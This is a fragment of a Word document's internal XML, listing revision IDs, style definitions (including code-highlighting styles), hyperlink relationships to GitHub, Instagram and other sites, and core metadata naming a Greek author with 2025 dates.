    <w:rsid w:val="00972C42"/>
    <w:rsid w:val="00977B52"/>
    <w:rsid w:val="009937F3"/>
    <w:rsid w:val="009A53A7"/>
    <w:rsid w:val="00A12ACD"/>
    <w:rsid w:val="00A14B8B"/>
    <w:rsid w:val="00A16F3C"/>
    <w:rsid w:val="00A513EE"/>
    <w:rsid w:val="00A52886"/>
    <w:rsid w:val="00A81F26"/>
    <w:rsid w:val="00A96003"/>
    <w:rsid w:val="00AA3958"/>
    <w:rsid w:val="00AE657E"/>
    <w:rsid w:val="00B07505"/>
    <w:rsid w:val="00B32B09"/>
    <w:rsid w:val="00B3780B"/>
    <w:rsid w:val="00B9483F"/>
    <w:rsid w:val="00BB4E17"/>
    <w:rsid w:val="00BC5416"/>
    <w:rsid w:val="00BF377F"/>
    <w:rsid w:val="00C05876"/>
    <w:rsid w:val="00C23493"/>
    <w:rsid w:val="00C8340C"/>
    <w:rsid w:val="00CC1E57"/>
    <w:rsid w:val="00CD0C20"/>
    <w:rsid w:val="00CD1B19"/>
    <w:rsid w:val="00CE248D"/>
    <w:rsid w:val="00CF6BFF"/>
    <w:rsid w:val="00D12FD7"/>
    <w:rsid w:val="00D227D7"/>
    <w:rsid w:val="00D23FF6"/>
    <w:rsid w:val="00D31FC9"/>
    <w:rsid w:val="00D36D1E"/>
    <w:rsid w:val="00D9228F"/>
    <w:rsid w:val="00D94A96"/>
    <w:rsid w:val="00DA5BB5"/>
    <w:rsid w:val="00DE3BFE"/>
    <w:rsid w:val="00E20286"/>
    <w:rsid w:val="00E3169D"/>
    <w:rsid w:val="00E86906"/>
    <w:rsid w:val="00ED207C"/>
    <w:rsid w:val="00F8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34A45"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80029E5E-6926-4EEC-97EB-1C316B39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526"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00583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3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8A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A437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14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45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8145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F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F3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A16F3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F3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E2028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l-GR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009166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l-GR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66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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="el-G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66C5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="el-GR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9483F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0A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-type">
    <w:name w:val="hljs-type"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4765"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-subst">
    <w:name w:val="hljs-subst"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000A4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www.asahi.co.jp/expo70_archiv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gitpreUwU/horse_racing/compare/ffe38def52bafdd195dba8360caade99a43a9342...b36b948712bb3357cbcd36a9efdb9a2f990a0f49" TargetMode="Externa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github.com/gitpreUwU/horse_racing/commit/825ca69471333d8b5d2979a6c5c7c56f27730f66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instagram.com/p/DMzEckzO40N/?img_index=8" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.tokyotower.co.jp/lightup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801332-BF0E-4AA4-82CD-0D153D8A7549}">
  <we:reference id="WA104382008" version="1.1.0.2" store="Omex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6055</Words>
  <Characters>32703</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>272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ΑΛΕΞΟΠΟΥΛΟΣ ΙΩΑΝΝΗΣ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ΑΛΕΞΟΠΟΥΛΟΣ ΙΩΑΝΝΗΣ</cp:lastModifiedBy>
  <cp:revision>109</cp:revision>
  <cp:lastPrinted>2025-08-31T10:32:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-12T14:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-31T10:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>